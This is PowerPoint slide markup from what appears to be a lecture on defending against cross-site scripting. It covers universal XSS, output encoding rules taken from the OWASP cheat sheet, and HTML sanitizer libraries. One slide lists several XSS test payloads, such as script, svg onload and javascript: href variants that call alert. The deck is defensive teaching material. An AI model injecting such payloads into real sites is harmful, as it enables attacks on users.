            <a:off x="238124" y="5251013"/>
            <a:ext cx="81701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https://www.youtube.com/watch?v=lG7U3fuNw3A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://cure53.de/fp170.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://hackinparis.com/data/slides/2013/slidesmarioheiderich.pdf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098455D-214C-4A5B-9D5F-2EA049552F7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="238125" y="3979259"/>
            <a:ext cx="6215227" cy="1105285"/>
            <a:chOff x="238125" y="3979259"/>
            <a:chExt cx="6215227" cy="1105285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EE41CC3-A7BE-465D-B85C-E35840ADF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125" y="3979259"/>
              <a:ext cx="6215227" cy="1105285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A8E2E40-C5E7-4B4D-BF63-D051F1788219}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3436883" y="3979259"/>
              <a:ext cx="1639614" cy="5717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051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ECBB646-103D-41FE-B7DB-0F4CB664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uXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (universal XSS)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D589D9D-2978-4D78-9900-975FAA13B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 vulnerabilities of browser or browser extension</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attacker gains control over all sessions in the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>doesn’t depend on a vulnerable web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>previous publicly known cases (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>exz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adobe Acrobat extension for IE 6 and Mozilla</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS Filter of IE 8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Flash Player</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chrome for Android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905D52B-92BD-419C-B0B2-4813CDF41560}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536026" y="5846544"/>
            <a:ext cx="107310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https://www.acunetix.com/blog/articles/universal-cross-site-scripting-uxss/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://research.google/pubs/pub48028/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="421627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67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7D2443-D71C-4224-A6D2-2997F6374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Validation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27958B-45DC-497F-9FD6-A98F1859E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/>
              <a:t>Yes,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strict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possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>most</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>probably</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>that‘s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>enough</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> 2nd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>line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defense</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>there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hundreds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possible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>variations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>points</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>very</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>hard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filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> all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them</a:t>
            </a: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pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>&gt;alert('XSS')&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>svg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>=alert('XSS') /&gt;</a:t>
            </a:r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img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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> @error=this.alert('XSS')&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>('XSS')"&gt;XSS&lt;/a&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRP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sz="2000" dirty="0"/>
              <a:t>https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="2000" dirty="0"/>
              <a:t>https://owasp.org/www-community/xss-filter-evasion-cheatsheet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9624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D411E-4ED3-98C6-C63A-BE8438F2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Context-Sensitive Output Encoding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3F1E3E-6FCE-9911-CDFC-50176D670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05" y="1498902"/>
            <a:ext cx="11305403" cy="444817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40CA457-CE14-25A9-11FF-9379B75A7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358" y="5885429"/>
            <a:ext cx="4019757" cy="82554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DA215A7-952F-A2EF-C743-D13AA793C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" t="8028" r="10571" b="4636"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7886358" y="5619216"/>
            <a:ext cx="4019757" cy="26621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4DDAB30-28EF-3DBD-32C2-0450AAF9D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54" y="1778688"/>
            <a:ext cx="5464616" cy="3387331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C07461B-94FA-CF27-0F6C-DAF650076C3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="91082" y="5238729"/>
            <a:ext cx="10411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FD5EA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html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E15CC14-2F54-7166-B5BC-4C517794B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006" y="1728789"/>
            <a:ext cx="5562886" cy="74933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1F256A-2589-4434-8A35-49E6E6591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376" y="2744341"/>
            <a:ext cx="6128146" cy="100142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260DEC3-426F-92BB-9B7D-091AA4919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9390" y="4025434"/>
            <a:ext cx="5598305" cy="26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7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Context-Sensitive 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0165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 err="1"/>
              <a:t>Really</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>depends</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> on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context</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>OWASP Cheat Sheet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>lists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> 12 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>rules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successful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>prevention</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>first</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> 4:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>#0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Never Insert Untrusted Data Except in Allowed Locations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>#1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML Encode Before Inserting Untrusted Data into HTML Element Content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#2 Attribute Encode Before Inserting Untrusted Data into HTML</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     Common Attributes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#3 JavaScript Encode Before Inserting Untrusted Data into JavaScript</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     Data Values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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82752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#0 Never Insert Untrusted Data Except in Allowed Locations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1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR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7C5054-3319-4342-960A-5E442E8FF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005" y="2039006"/>
            <a:ext cx="3709345" cy="413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23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AT" dirty="0"/>
              <a:t>#1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML Encode Before Inserting Untrusted Data into HTML Element Content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Characters to encode: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fr-FR" dirty="0"/>
              <a:t>&amp; --&gt; &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>amp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&lt; --&gt; &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>lt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&gt; --&gt; &amp;gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>	" --&gt; &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>quot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' --&gt; &amp;#x27;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9C35D2-9660-453C-9CF0-5260888D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292" y="2648186"/>
            <a:ext cx="4066190" cy="64381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F8D5512-8EF1-495E-ABA5-4B4E0D981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057" y="2648186"/>
            <a:ext cx="3848429" cy="6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1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96561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dirty="0"/>
              <a:t>#2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attribute Encode Before Inserting Untrusted Data into HTML</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     Common Attributes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de-DE" sz="2600" dirty="0" err="1"/>
              <a:t>Encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t> all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0" err="1"/>
              <a:t>characters</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t>(excl. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0" err="1"/>
              <a:t>alphanumeric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t>) in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t>„&amp;#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0" err="1"/>
              <a:t>xHH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t>“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0" err="1"/>
              <a:t>format</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0" err="1"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0" err="1"/>
              <a:t>named</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0" err="1"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0" err="1"/>
              <a:t>available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Especially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unquoted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0" err="1"/>
              <a:t>attributes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t>   [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0" err="1"/>
              <a:t>space</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t>] % * + , - / ; &lt; = &gt; ^ and |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558635-1FC0-4AEE-B36C-C163AB063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157" y="1960753"/>
            <a:ext cx="5336737" cy="26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5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/>
              <a:t>#3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript Encode Before Inserting Untrusted Data into JavaScript Data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de-DE" dirty="0" err="1"/>
              <a:t>Encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>characters</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>(excl. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>alphanumeric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>) in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>„\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>xHH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>format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03E69F-0CD0-4974-A335-E7A63ACD1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01072"/>
            <a:ext cx="5714360" cy="246582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6153FDF-BFA0-409B-8F6E-B3E74078F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511" y="4601835"/>
            <a:ext cx="6595406" cy="88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7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33CD717-313E-4C78-A53B-5FAA79CDE93D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640985" y="2970422"/>
            <a:ext cx="6910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</a:rPr>
              <a:t>Let‘s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discuss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>few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more</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="32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368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FC430-5BD6-CCB1-9AB3-7AFC7F6E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Sanitization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0E7224B-07B7-648A-6DF1-E62B6B170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122" y="5915643"/>
            <a:ext cx="4864350" cy="80014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217A137-0432-640F-F9B4-48FB1AC2ED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09" r="14452" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7172122" y="5694928"/>
            <a:ext cx="4862174" cy="22071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FED3DC5-6161-A4B4-54D6-3543F3D1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448" y="1593756"/>
            <a:ext cx="5893103" cy="18352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DF515C0-E733-69ED-5387-1476DE964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303" y="3649715"/>
            <a:ext cx="8611043" cy="118751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6D41F4E-F696-8856-08B4-40C1E9BC6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6327" y="5057941"/>
            <a:ext cx="2723846" cy="25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1D9EA4-E5E5-E86E-F4CB-FAD00B462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also possible on client-side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E5DD4719-C72E-16FA-53C5-FB08E5EC8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04" y="1518673"/>
            <a:ext cx="11305403" cy="44481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sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sanitization with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DOMPurify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Avoid unsafe sinks like</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>outerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, write and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>writeln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“Safe Sinks” instead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541CE514-53F5-1494-B8B1-B43B16061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8341" b="17656"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="583039" y="4887874"/>
            <a:ext cx="4111228" cy="146413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2E24FFF-3CEA-2708-3068-83EB9284D6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225"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="583039" y="2621430"/>
            <a:ext cx="4111228" cy="539778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7C5BD109-4642-D80B-6523-31A888A234B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="625173" y="6496852"/>
            <a:ext cx="10411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https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html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8F65884-AB35-4BEC-2F82-47E52ACFB8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43" b="31029"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5175101" y="1749247"/>
            <a:ext cx="6872634" cy="26400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427EE9A-8B6F-040A-60E4-504C07A7A4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726"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4822491" y="6006927"/>
            <a:ext cx="7262549" cy="18964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25BE098-6128-4ABE-6188-533769D2AE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190" b="3439"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5195777" y="4475524"/>
            <a:ext cx="6894634" cy="42117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A4AE00C-9FE8-8BE4-0ED1-1907B260C3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5146" b="51646"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5201436" y="3119262"/>
            <a:ext cx="6842846" cy="19557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1553AE3-0BF3-A779-E3F2-8F9FFB41E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0739" y="2094783"/>
            <a:ext cx="6027029" cy="90707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B2253A1-B7C6-DCEC-28B7-E18460993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7275" y="5007016"/>
            <a:ext cx="5956544" cy="91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3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7EEF5-79A7-4004-AE05-34F7CB67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FE67B4-8696-45FB-8B3A-8286C3499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220"/>
            <a:ext cx="10515600" cy="494537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.NET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HtmlSanitizer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/mganss/HtmlSanitizer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OWASP Java HTML Sanitizer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://owasp.org/www-project-java-html-sanitizer/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Ruby on Rails </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SanitizeHelper</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html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Python Bleach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://pypi.org/project/bleach/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PHP HTML Purifier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://htmlpurifier.org/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JavaScript / Node.js</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML sanitizer (Google Closure Library)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/google/closure-library/blob/master/closure/goog/html/sanitizer/htmlsanitizer.js</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DOMPurify</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/cure53/DOMPurify</a:t>
            </a:r>
          </a:p>
          <a:p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F26032-2A1B-44DF-BABC-8C8FC369C64A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="178676" y="6405799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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
